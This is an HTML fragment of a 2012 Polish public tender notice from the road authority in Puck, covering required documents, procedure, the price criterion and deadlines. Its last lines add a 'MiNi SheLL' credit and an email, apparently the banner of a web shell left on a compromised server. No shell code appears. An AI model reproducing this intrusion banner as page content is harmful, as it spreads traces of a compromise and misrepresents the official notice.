<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy również załączyć:
1. Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę,  o ile nie wynika to z przedstawionych dokumentów rejestrowych.
2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian w umowie w przypadku zmiany stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zd.puck.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można pobrać ze strony Zamawiającego lub uzyskać po uprzednim złożeniu pisemnego wniosku o przekazanie SIWZ. Opłata jakiej Zamawiający zażąda będzie pokrywać koszty jej druku oraz przekazania.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2012 godzina 09:00, miejsce: Zarząd Drogowy dla Powiatu Puckiego i Wejherowskiego z siedzibą w Pucku, ul. Orzeszkowej 5, 84-100 Puck, pok. nr 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com